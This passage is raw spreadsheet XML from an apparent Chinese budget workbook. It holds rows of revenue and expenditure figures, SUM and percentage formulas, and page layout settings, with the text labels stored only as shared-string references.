      <c r="D1274" s="100">
        <v>0</v>
      </c>
      <c r="E1274" s="173"/>
      <c r="F1274" s="174"/>
      <c r="G1274" s="172"/>
    </row>
    <row r="1275" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1275" s="128" t="s">
        <v>1352</v>
      </c>
      <c r="B1275" s="100">
        <f>182034-1500-5133+226-3500-1995-2500-1138-720-2000+34-5735-4500+500+2000-12639+1002-7830+800+150+96-115-608-100-400-690+400+800-210+500+220+100+744+500+483</f>
        <v>139276</v>
      </c>
      <c r="C1275" s="100">
        <f>94678-1500-5133+226-3500-1995-2500-1138-720-2000+34-1500-5735-4500+500+2000-13339-11259+1000-7830+800+150+96-115-608-100-400-690+400+800-210+500+220+100+744+500+483</f>
        <v>38459</v>
      </c>
      <c r="D1275" s="100">
        <f>98135+3500-2500-2600-1000-14326-800-500-100+1500+14326+1597-845-500-32-150</f>
        <v>95705</v>
      </c>
      <c r="E1275" s="173">
        <f>57720+3500-2500-2600-1000-14326-800-500-100+1500+1597-845-500-32-150</f>
        <v>40964</v>
      </c>
      <c r="F1275" s="174">
        <f>E1275/C1275*100</f>
        <v>106.51342988637249</v>
      </c>
      <c r="G1275" s="172"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:G1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.71" right="0.55" top="0.94" bottom="0.87" header="0.51" footer="0.47"/>
  <pageSetup firstPageNumber="14" useFirstPageNumber="1" fitToHeight="4" horizontalDpi="600" verticalDpi="600" orientation="landscape" pageOrder="overThenDown" paperSize="9" scale="91"/>
  <headerFooter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E18"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="C10" sqref="C10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="17.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="42.00390625" style="90" customWidth="1"/>
    <col min="2" max="2" width="15.375" style="90" customWidth="1"/>
    <col min="3" max="3" width="62.375" style="90" customWidth="1"/>
    <col min="4" max="4" width="9.00390625" style="90" customWidth="1"/>
    <col min="5" max="5" width="13.25390625" style="90" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="14.50390625" style="90" bestFit="1" customWidth="1"/>
    <col min="7" max="16384" width="9.00390625" style="90" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" s="88" customFormat="1" ht="43.5" customHeight="1">
      <c r="A1" s="7" t="s">
        <v>1353</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="7"/>
    </row>
    <row r="2" spans="1:3" ht="29.25" customHeight="1">
      <c r="A2" s="91" t="s">
        <v>1354</v>
      </c>
      <c r="B2" s="92"/>
      <c r="C2" s="93" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:5" ht="40.5" customHeight="1">
      <c r="A3" s="11" t="s">
        <v>1355</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>1356</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>356</v>
      </c>
      <c r="D3" s="110"/>
      <c r="E3" s="110"/>
    </row>
    <row r="4" spans="1:5" s="89" customFormat="1" ht="23.25" customHeight="1">
      <c r="A4" s="100" t="s">
        <v>1357</v>
      </c>
      <c r="B4" s="107">
        <f>SUM(B5:B18)</f>
        <v>359992</v>
      </c>
      <c r="C4" s="150"/>
      <c r="D4" s="110"/>
      <c r="E4" s="110"/>
    </row>
    <row r="5" spans="1:5" ht="23.25" customHeight="1">
      <c r="A5" s="108" t="s">
        <v>1358</v>
      </c>
      <c r="B5" s="107">
        <v>46798</v>
      </c>
      <c r="C5" s="151"/>
      <c r="E5" s="111"/>
    </row>
    <row r="6" spans="1:5" ht="23.25" customHeight="1">
      <c r="A6" s="108" t="s">
        <v>1359</v>
      </c>
      <c r="B6" s="107">
        <f>59426+250</f>
        <v>59676</v>
      </c>
      <c r="C6" s="152"/>
      <c r="E6" s="111"/>
    </row>
    <row r="7" spans="1:5" ht="23.25" customHeight="1">
      <c r="A7" s="108" t="s">
        <v>1360</v>
      </c>
      <c r="B7" s="100">
        <v>6861</v>
      </c>
      <c r="C7" s="153"/>
      <c r="E7" s="111"/>
    </row>
    <row r="8" spans="1:5" ht="23.25" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>1361</v>
      </c>
      <c r="B8" s="100">
        <v>17</v>
      </c>
      <c r="C8" s="151"/>
      <c r="E8" s="111"/>
    </row>
    <row r="9" spans="1:5" ht="23.25" customHeight="1">
      <c r="A9" s="108" t="s">
        <v>1362</v>
      </c>
      <c r="B9" s="100">
        <v>96586</v>
      </c>
      <c r="C9" s="154"/>
      <c r="E9" s="111"/>
    </row>
    <row r="10" spans="1:5" ht="23.25" customHeight="1">
      <c r="A10" s="108" t="s">
        <v>1363</v>
      </c>
      <c r="B10" s="100">
        <v>3376</v>
      </c>
      <c r="C10" s="150"/>
      <c r="E10" s="111"/>
    </row>
    <row r="11" spans="1:5" ht="23.25" customHeight="1">
      <c r="A11" s="108" t="s">
        <v>1364</v>
      </c>
      <c r="B11" s="100">
        <v>18771</v>
      </c>
      <c r="C11" s="150"/>
      <c r="E11" s="111"/>
    </row>
    <row r="12" spans="1:5" ht="23.25" customHeight="1">
      <c r="A12" s="108" t="s">
        <v>1365</v>
      </c>
      <c r="B12" s="100">
        <v>1000</v>
      </c>
      <c r="C12" s="150"/>
      <c r="E12" s="111"/>
    </row>
    <row r="13" spans="1:5" ht="23.25" customHeight="1">
      <c r="A13" s="157" t="s">
        <v>1366</v>
      </c>
      <c r="B13" s="100">
        <v>6469</v>
      </c>
      <c r="C13" s="150"/>
      <c r="E13" s="111"/>
    </row>
    <row r="14" spans="1:5" ht="23.25" customHeight="1">
      <c r="A14" s="108" t="s">
        <v>1367</v>
      </c>
      <c r="B14" s="100"/>
      <c r="C14" s="150"/>
      <c r="E14" s="111"/>
    </row>
    <row r="15" spans="1:5" ht="23.25" customHeight="1">
      <c r="A15" s="108" t="s">
        <v>1368</v>
      </c>
      <c r="B15" s="100">
        <v>18214</v>
      </c>
      <c r="C15" s="150"/>
      <c r="E15" s="111"/>
    </row>
    <row r="16" spans="1:5" ht="23.25" customHeight="1">
      <c r="A16" s="108" t="s">
        <v>1369</v>
      </c>
      <c r="B16" s="100"/>
      <c r="C16" s="150"/>
      <c r="E16" s="111"/>
    </row>
    <row r="17" spans="1:5" ht="23.25" customHeight="1">
      <c r="A17" s="156" t="s">
        <v>1370</v>
      </c>
      <c r="B17" s="107">
        <v>8000</v>
      </c>
      <c r="C17" s="150"/>
      <c r="E17" s="111"/>
    </row>
    <row r="18" spans="1:5" ht="23.25" customHeight="1">
      <c r="A18" s="156" t="s">
        <v>1371</v>
      </c>
      <c r="B18" s="100">
        <f>106592-4186-32-150-8000</f>
        <v>94224</v>
      </c>
      <c r="C18" s="150"/>
      <c r="E18" s="111"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:C1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="44" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter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A1:G28"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A3">
      <selection activeCell="A1" sqref="A1:C1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="17.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="46.625" style="90" customWidth="1"/>
    <col min="2" max="2" width="14.25390625" style="90" customWidth="1"/>
    <col min="3" max="3" width="60.00390625" style="90" customWidth="1"/>
    <col min="4" max="4" width="9.00390625" style="90" customWidth="1"/>
    <col min="5" max="5" width="19.75390625" style="90" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="14.50390625" style="90" bestFit="1" customWidth="1"/>
    <col min="7" max="16384" width="9.00390625" style="90" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" s="88" customFormat="1" ht="39" customHeight="1">
      <c r="A1" s="7" t="s">
        <v>1372</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="7"/>
    </row>
    <row r="2" spans="1:3" ht="22.5" customHeight="1">
      <c r="A2" s="91" t="s">
        <v>1373</v>
      </c>
      <c r="B2" s="92"/>
      <c r="C2" s="93" t="s">
        <v>259</v>
      </c>
    </row>
    <row r="3" spans="1:5" ht="34.5" customHeight="1">
      <c r="A3" s="11" t="s">
        <v>1355</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>1356</v>
      </c>
      <c r="C3" s="11" t="s">
        <v>356</v>
      </c>
      <c r="D3" s="110"/>
      <c r="E3" s="110"/>
    </row>
    <row r="4" spans="1:7" s="89" customFormat="1" ht="15" customHeight="1">
      <c r="A4" s="100" t="s">
        <v>1357</v>
      </c>
      <c r="B4" s="107">
        <f>B5+B10+B21+B24</f>
        <v>132668</v>
      </c>
      <c r="C4" s="150"/>
      <c r="D4" s="110"/>
      <c r="E4" s="110"/>
      <c r="F4" s="110"/>
      <c r="G4" s="110"/>
    </row>
    <row r="5" spans="1:7" ht="15" customHeight="1">
      <c r="A5" s="103" t="s">
        <v>1358</v>
      </c>
      <c r="B5" s="107">
        <f>SUM(B6:B9)</f>
        <v>40150</v>
      </c>
      <c r="C5" s="151"/>
      <c r="D5" s="111"/>
      <c r="E5" s="111"/>
      <c r="F5" s="111"/>
      <c r="G5" s="111"/>
    </row>
    <row r="6" spans="1:6" ht="15" customHeight="1">
      <c r="A6" s="108" t="s">
        <v>1374</v>
      </c>
      <c r="B6" s="107">
        <v>28192</v>
      </c>
      <c r="C6" s="152"/>
      <c r="F6" s="111"/>
    </row>
    <row r="7" spans="1:6" ht="15" customHeight="1">
      <c r="A7" s="108" t="s">
        <v>1375</v>
      </c>
      <c r="B7" s="100">
        <v>7613</v>
      </c>
      <c r="C7" s="153"/>
      <c r="F7" s="111"/>
    </row>
    <row r="8" spans="1:6" ht="15" customHeight="1">
      <c r="A8" s="108" t="s">
        <v>1376</v>
      </c>
      <c r="B8" s="100">
        <v>4282</v>
      </c>
      <c r="C8" s="151"/>
      <c r="F8" s="111"/>
    </row>
    <row r="9" spans="1:6" ht="15" customHeight="1">
      <c r="A9" s="108" t="s">
        <v>1377</v>
      </c>
      <c r="B9" s="100">
        <v>63</v>
      </c>
      <c r="C9" s="154"/>
      <c r="F9" s="111"/>
    </row>
    <row r="10" spans="1:6" ht="15" customHeight="1">
      <c r="A10" s="103" t="s">
        <v>1359</v>
      </c>
      <c r="B10" s="155">
        <f>SUM(B11:B20)</f>
        <v>6056</v>
      </c>
      <c r="C10" s="150"/>
      <c r="D10" s="111"/>
      <c r="E10" s="111"/>
      <c r="F10" s="111"/>
    </row>
    <row r="11" spans="1:6" ht="15" customHeight="1">
      <c r="A11" s="156" t="s">
        <v>1378</v>
      </c>
      <c r="B11" s="107">
        <v>3591</v>
      </c>
      <c r="C11" s="150"/>
      <c r="F11" s="111"/>
    </row>
    <row r="12" spans="1:6" ht="15" customHeight="1">
      <c r="A12" s="156" t="s">
        <v>1379</v>
      </c>
      <c r="B12" s="100">
        <v>110</v>
      </c>
      <c r="C12" s="150"/>
      <c r="F12" s="111"/>
    </row>
    <row r="13" spans="1:6" ht="15" customHeight="1">
      <c r="A13" s="108" t="s">
        <v>1380</v>
      </c>
      <c r="B13" s="107">
        <v>127</v>
      </c>
      <c r="C13" s="151"/>
      <c r="F13" s="111"/>
    </row>
    <row r="14" spans="1:6" ht="15" customHeight="1">
      <c r="A14" s="108" t="s">
        <v>1381</v>
      </c>
      <c r="B14" s="107">
        <v>53</v>
      </c>
      <c r="C14" s="151"/>
      <c r="F14" s="111"/>
    </row>
    <row r="15" spans="1:6" ht="15" customHeight="1">
      <c r="A15" s="108" t="s">
        <v>1382</v>
      </c>
      <c r="B15" s="107">
        <v>801</v>
      </c>
      <c r="C15" s="151"/>
      <c r="F15" s="111"/>
    </row>
    <row r="16" spans="1:6" ht="15" customHeight="1">
      <c r="A16" s="108" t="s">
        <v>1383</v>
      </c>
      <c r="B16" s="107">
        <v>121</v>
      </c>
      <c r="C16" s="151"/>
      <c r="F16" s="111"/>
    </row>
    <row r="17" spans="1:6" ht="15" customHeight="1">
      <c r="A17" s="108" t="s">
        <v>1384</v>
      </c>
      <c r="B17" s="107">
        <v>89</v>
      </c>
      <c r="C17" s="151"/>
      <c r="F17" s="111"/>
    </row>
    <row r="18" spans="1:6" ht="15" customHeight="1">
      <c r="A18" s="108" t="s">
        <v>1385</v>
      </c>
      <c r="B18" s="107">
        <v>458</v>
      </c>
      <c r="C18" s="151"/>
      <c r="F18" s="111"/>
    </row>
    <row r="19" spans="1:6" ht="15" customHeight="1">
      <c r="A19" s="108" t="s">
        <v>1386</v>
      </c>
      <c r="B19" s="107">
        <v>241</v>
      </c>
      <c r="C19" s="151"/>
      <c r="F19" s="111"/>
    </row>
    <row r="20" spans="1:6" ht="15" customHeight="1">
      <c r="A20" s="108" t="s">
        <v>1387</v>
      </c>
      <c r="B20" s="107">
        <v>465</v>
      </c>
      <c r="C20" s="151"/>
      <c r="F20" s="111"/>
    </row>
    <row r="21" spans="1:6" ht="15" customHeight="1">
      <c r="A21" s="103" t="s">
        <v>1388</v>
      </c>
      <c r="B21" s="107">
        <f>SUM(B22:B23)</f>
        <v>81032</v>
      </c>
      <c r="C21" s="151"/>
      <c r="F21" s="111"/>
    </row>
    <row r="22" spans="1:6" ht="15" customHeight="1">
      <c r="A22" s="108" t="s">
        <v>1389</v>
      </c>
      <c r="B22" s="107">
        <f>69440+4914</f>
        <v>74354</v>
      </c>
      <c r="C22" s="151"/>
      <c r="F22" s="111"/>
    </row>
    <row r="23" spans="1:6" ht="15" customHeight="1">
      <c r="A23" s="108" t="s">
        <v>1390</v>
      </c>
      <c r="B23" s="107">
        <v>6678</v>
      </c>
      <c r="C23" s="151"/>
      <c r="F23" s="111"/>
    </row>
    <row r="24" spans="1:6" ht="15" customHeight="1">
      <c r="A24" s="103" t="s">
        <v>1391</v>
      </c>
      <c r="B24" s="107">
        <f>SUM(B25:B28)</f>
        <v>5430</v>
      </c>
      <c r="C24" s="151"/>
      <c r="F24" s="111"/>
    </row>
    <row r="25" spans="1:6" ht="15" customHeight="1">
      <c r="A25" s="108" t="s">
        <v>1392</v>
      </c>
      <c r="B25" s="107">
        <v>1119</v>
      </c>
      <c r="C25" s="151"/>
      <c r="F25" s="111"/>
    </row>
    <row r="26" spans="1:6" ht="15" customHeight="1">
      <c r="A26" s="108" t="s">
        <v>1393</v>
      </c>
      <c r="B26" s="107">
        <v>385</v>
      </c>
      <c r="C26" s="151"/>
      <c r="F26" s="111"/>
    </row>
    <row r="27" spans="1:6" ht="15" customHeight="1">
      <c r="A27" s="108" t="s">
        <v>1394</v>
      </c>
      <c r="B27" s="107">
        <v>3696</v>
      </c>
      <c r="C27" s="151"/>
      <c r="F27" s="111"/>
    </row>
    <row r="28" spans="1:6" ht="15" customHeight="1">
      <c r="A28" s="108" t="s">
        <v>1395</v>
      </c>
      <c r="B28" s="107">
        <v>230</v>
      </c>
      <c r="C28" s="151"/>
      <c r="F28" s="111"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:C1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="45" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet17.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:E21"/>
  <sheetViews>
    <sheetView workbookViewId="0" topLeftCell="A1">
      <selection activeCell="E27" sqref="E27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="47.125" style="114" customWidth="1"/>
    <col min="2" max="2" width="15.375" style="114" customWidth="1"/>
    <col min="3" max="3" width="16.00390625" style="115" customWidth="1"/>
    <col min="4" max="4" width="13.875" style="114" customWidth="1"/>
    <col min="5" max="5" width="29.25390625" style="116" customWidth="1"/>
    <col min="6" max="16384" width="9.00390625" style="114" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="31.5" customHeight="1">
      <c r="A1" s="118" t="s">
        <v>1396</v>
      </c>
      <c r="B1" s="118"/>
      <c r="C1" s="118"/>
      <c r="D1" s="118"/>
      <c r="E1" s="118"/>
    </row>
    <row r="2" spans="1:5" ht="23.25" customHeight="1">
      <c r="A2" s="120" t="s">
        <v>1397</v>
      </c>
      <c r="B2" s="121"/>
      <c r="C2" s="122"/>
      <c r="D2" s="121"/>
      <c r="E2" s="123" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="3" spans="1:5" s="112" customFormat="1" ht="33" customHeight="1">
      <c r="A3" s="135" t="s">
        <v>260</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>353</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>354</v>
      </c>
      <c r="D3" s="136" t="s">
        <v>355</v>
      </c>
      <c r="E3" s="135" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="21" customHeight="1">
      <c r="A4" s="13" t="s">
        <v>292</v>
      </c>
      <c r="B4" s="137">
        <f>SUM(B5:B20)</f>
        <v>174917</v>
      </c>
      <c r="C4" s="137">
        <f>SUM(C5:C20)</f>
        <v>254456</v>
      </c>
      <c r="D4" s="105">
        <f>100*C4/B4</f>
        <v>145.47242406398462</v>
      </c>
      <c r="E4" s="138"/>
    </row>
    <row r="5" spans="1:5" ht="21" customHeight="1">
      <c r="A5" s="17" t="s">
        <v>1398</v>
      </c>
      <c r="B5" s="137"/>
      <c r="C5" s="137"/>
      <c r="D5" s="105"/>
      <c r="E5" s="139"/>
    </row>
    <row r="6" spans="1:5" ht="21" customHeight="1">
      <c r="A6" s="17" t="s">
        <v>1399</v>
      </c>
      <c r="B6" s="137"/>
      <c r="C6" s="137"/>
      <c r="D6" s="105"/>
      <c r="E6" s="20"/>
    </row>
    <row r="7" spans="1:5" ht="21" customHeight="1">
      <c r="A7" s="17" t="s">
        <v>1400</v>
      </c>
      <c r="B7" s="137"/>
      <c r="C7" s="137"/>
      <c r="D7" s="105"/>
      <c r="E7" s="20"/>
    </row>
    <row r="8" spans="1:5" ht="21" customHeight="1">
      <c r="A8" s="17" t="s">
        <v>1401</v>
      </c>
      <c r="B8" s="137"/>
      <c r="C8" s="137"/>
      <c r="D8" s="105"/>
      <c r="E8" s="20"/>
    </row>
    <row r="9" spans="1:5" s="113" customFormat="1" ht="21" customHeight="1">
      <c r="A9" s="140" t="s">
        <v>1402</v>
      </c>
      <c r="B9" s="126">
        <v>22765</v>
      </c>
      <c r="C9" s="126">
        <v>7000</v>
      </c>
      <c r="D9" s="129">
        <f aca="true" t="shared" si="0" ref="D9:D11">100*C9/B9</f>
        <v>30.74895673182517</v>
      </c>
      <c r="E9" s="141" t="s">
        <v>1403</v>
      </c>
    </row>
    <row r="10" spans="1:5" s="113" customFormat="1" ht="21" customHeight="1">
      <c r="A10" s="140" t="s">
        <v>1404</v>
      </c>
      <c r="B10" s="126">
        <v>469</v>
      </c>
      <c r="C10" s="126">
        <v>300</v>
      </c>
      <c r="D10" s="129">
        <f t="shared" si="0"/>
        <v>63.96588486140725</v>
      </c>
      <c r="E10" s="141"/>
    </row>
    <row r="11" spans="1:5" ht="21" customHeight="1">
      <c r="A11" s="17" t="s">
        <v>1405</v>
      </c>
      <c r="B11" s="137">
        <v>136420</v>
      </c>
      <c r="C11" s="137">
        <f>227716+4700</f>
        <v>232416</v>
      </c>
      <c r="D11" s="105">
        <f t="shared" si="0"/>
        <v>170.3679812344231</v>
      </c>
      <c r="E11" s="20"/>
    </row>
    <row r="12" spans="1:5" ht="21" customHeight="1">
      <c r="A12" s="17" t="s">
        <v>1406</v>
      </c>
      <c r="B12" s="137"/>
      <c r="C12" s="137"/>
      <c r="D12" s="105"/>
      <c r="E12" s="139"/>
    </row>
    <row r="13" spans="1:5" ht="21" customHeight="1">
      <c r="A13" s="17" t="s">
        <v>1407</v>
      </c>
      <c r="B13" s="137"/>
      <c r="C13" s="137">
        <v>4500</v>
      </c>
      <c r="D13" s="105"/>
      <c r="E13" s="139"/>
    </row>
    <row r="14" spans="1:5" ht="21" customHeight="1">
      <c r="A14" s="17" t="s">
        <v>1408</v>
      </c>
      <c r="B14" s="137">
        <v>12902</v>
      </c>
      <c r="C14" s="137">
        <v>8240</v>
      </c>
      <c r="D14" s="105">
        <f>100*C14/B14</f>
        <v>63.866067276391256</v>
      </c>
      <c r="E14" s="139"/>
    </row>
    <row r="15" spans="1:5" ht="21" customHeight="1">
      <c r="A15" s="142" t="s">
        <v>1409</v>
      </c>
      <c r="B15" s="137"/>
      <c r="C15" s="137"/>
      <c r="D15" s="105"/>
      <c r="E15" s="143"/>
    </row>
    <row r="16" spans="1:5" ht="21" customHeight="1">
      <c r="A16" s="142" t="s">
        <v>1410</v>
      </c>
      <c r="B16" s="137"/>
      <c r="C16" s="137"/>
      <c r="D16" s="105"/>
      <c r="E16" s="144"/>
    </row>
    <row r="17" spans="1:5" ht="21" customHeight="1">
      <c r="A17" s="17" t="s">
        <v>1411</v>
      </c>
      <c r="B17" s="145"/>
      <c r="C17" s="145"/>
      <c r="D17" s="105"/>
      <c r="E17" s="146"/>
    </row>
    <row r="18" spans="1:5" ht="21" customHeight="1">
      <c r="A18" s="17" t="s">
        <v>1412</v>
      </c>
      <c r="B18" s="137">
        <v>2361</v>
      </c>
      <c r="C18" s="137">
        <v>2000</v>
      </c>
      <c r="D18" s="105">
        <f>100*C18/B18</f>
        <v>84.70986869970352</v>
      </c>
      <c r="E18" s="147"/>
    </row>
    <row r="19" spans="1:5" ht="21" customHeight="1">
      <c r="A19" s="17" t="s">
        <v>1413</v>
      </c>
      <c r="B19" s="137"/>
      <c r="C19" s="137"/>
      <c r="D19" s="105"/>
      <c r="E19" s="148"/>
    </row>
    <row r="20" spans="1:5" ht="21" customHeight="1">
      <c r="A20" s="17" t="s">
        <v>1414</v>
      </c>
      <c r="B20" s="137"/>
      <c r="C20" s="137"/>
      <c r="D20" s="105"/>
      <c r="E20" s="148"/>
    </row>
    <row r="21" spans="1:5" ht="21" customHeight="1">
      <c r="A21" s="17" t="s">
        <v>1415</v>
      </c>
      <c r="B21" s="132"/>
      <c r="C21" s="149"/>
      <c r="D21" s="132"/>
      <c r="E21" s="133"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="1">
    <mergeCell ref="A1:E1"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.75" right="0.75" top="0.94" bottom="0.87" header="0.47" footer="0.47"/>
  <pageSetup firstPageNumber="46" useFirstPageNumber="1" horizontalDpi="600" verticalDpi="600" orientation="landscape" paperSize="9" scale="95"/>
  <headerFooter alignWithMargins="0">
    <oddFooter>&amp;C第 &amp;P 页</oddFooter>
  </headerFooter>
</worksheet>
</file>

<file path=xl/worksheets/sheet18.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:H237"/>
  <sheetViews>
    <sheetView showZeros="0" zoomScale="145" zoomScaleNormal="145" workbookViewId="0" topLeftCell="A1">
      <pane xSplit="1" ySplit="3" topLeftCell="B4" activePane="bottomRight" state="frozen"/>
      <selection pane="bottomRight" activeCell="B4" sqref="B4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="47.00390625" style="114" customWidth="1"/>
    <col min="2" max="2" width="11.125" style="114" customWidth="1"/>
    <col min="3" max="3" width="15.00390625" style="114" customWidth="1"/>
    <col min="4" max="4" width="10.625" style="115" customWidth="1"/>
    <col min="5" max="5" width="14.75390625" style="115" customWidth="1"/>
    <col min="6" max="6" width="13.50390625" style="114" customWidth="1"/>
    <col min="7" max="7" width="16.25390625" style="116" customWidth="1"/>
    <col min="8" max="8" width="14.25390625" style="117" customWidth="1"/>
    <col min="9" max="16384" width="9.00390625" style="114" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="39" customHeight="1">
      <c r="A1" s="118" t="s">
        <v>1416</v>
      </c>
      <c r="B1" s="118"/>
      <c r="C1" s="118"/>
      <c r="D1" s="118"/>
      <c r="E1" s="118"/>
      <c r="F1" s="118"/>
      <c r="G1" s="118"/>
      <c r="H1" s="119"/>
    </row>
    <row r="2" spans="1:7" ht="18.75" customHeight="1">
      <c r="A2" s="120" t="s">
        <v>1417</v>
      </c>
      <c r="B2" s="121"/>
      <c r="C2" s="121"/>
      <c r="D2" s="122"/>
      <c r="E2" s="122"/>
      <c r="F2" s="121"/>
      <c r="G2" s="123" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="3" spans="1:7" s="112" customFormat="1" ht="39.75" customHeight="1">
      <c r="A3" s="11" t="s">
        <v>1418</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>359</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>1419</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>354</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>1419</v>
      </c>
      <c r="F3" s="11" t="s">
        <v>1420</v>
      </c>
      <c r="G3" s="11" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="4" spans="1:7" s="112" customFormat="1" ht="19.5" customHeight="1">
      <c r="A4" s="13" t="s">
        <v>1421</v>
      </c>
      <c r="B4" s="12">
        <f>SUM(B5,B21,B33,B44,B99,B123,B175,B179,B204,B221)</f>
        <v>240705</v>
      </c>
      <c r="C4" s="12">
        <f>SUM(C5,C21,C33,C44,C99,C123,C175,C179,C204,C221)</f>
        <v>97950</v>
      </c>
      <c r="D4" s="12">
        <f>SUM(D5,D21,D33,D44,D99,D123,D175,D179,D204,D221)</f>
        <v>380184</v>
      </c>
      <c r="E4" s="12">
        <f>SUM(E5,E21,E33,E44,E99,E123,E175,E179,E204,E221)</f>
        <v>254456</v>
      </c>
      <c r="F4" s="124">
        <f>100*D4/B4</f>
        <v>157.94603352651586</v>
      </c>
      <c r="G4" s="11"/>
    </row>
    <row r="5" spans="1:7" ht="19.5" customHeight="1">
      <c r="A5" s="125" t="s">
        <v>1422</v>
      </c>
      <c r="B5" s="126">
        <v>133</v>
      </c>
      <c r="C5" s="126">
        <v>0</v>
      </c>
      <c r="D5" s="126">
        <v>255</v>
      </c>
      <c r="E5" s="126">
        <f>SUM(E6,E12,E18)</f>
        <v>0</v>
      </c>
      <c r="F5" s="105">
        <f aca="true" t="shared" si="0" ref="F5:F37">100*D5/B5</f>
        <v>191.72932330827066</v>
      </c>
      <c r="G5" s="127"/>
    </row>
    <row r="6" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A6" s="125" t="s">
        <v>1423</v>
      </c>
      <c r="B6" s="126">
        <f>SUM(B7:B11)</f>
        <v>0</v>
      </c>
      <c r="C6" s="126">
        <f>SUM(C7:C11)</f>
        <v>0</v>
      </c>
      <c r="D6" s="126">
        <f>SUM(D7:D11)</f>
        <v>0</v>
      </c>
      <c r="E6" s="126">
        <f>SUM(E7:E11)</f>
        <v>0</v>
      </c>
      <c r="F6" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G6" s="127"/>
    </row>
    <row r="7" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A7" s="125" t="s">
        <v>1424</v>
      </c>
      <c r="B7" s="126"/>
      <c r="C7" s="126"/>
      <c r="D7" s="126"/>
      <c r="E7" s="126"/>
      <c r="F7" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G7" s="127"/>
    </row>
    <row r="8" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A8" s="125" t="s">
        <v>1425</v>
      </c>
      <c r="B8" s="126"/>
      <c r="C8" s="126"/>
      <c r="D8" s="126"/>
      <c r="E8" s="126"/>
      <c r="F8" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G8" s="127"/>
    </row>
    <row r="9" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A9" s="125" t="s">
        <v>1426</v>
      </c>
      <c r="B9" s="126"/>
      <c r="C9" s="126"/>
      <c r="D9" s="126"/>
      <c r="E9" s="126"/>
      <c r="F9" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G9" s="127"/>
    </row>
    <row r="10" spans="1:7" ht="19.5" customHeight="1" hidden="1">
      <c r="A10" s="125" t="s">
        <v>1427</v>
      </c>
      <c r="B10" s="126"/>
      <c r="C10" s="126"/>
      <c r="D10" s="126"/>
      <c r="E10" s="126"/>
      <c r="F10" s="105" t="e">
        <f t="shared" si="0"/>
        <v>#DIV/0!</v>
      </c>
      <c r="G10" s="127"/>
    </row>
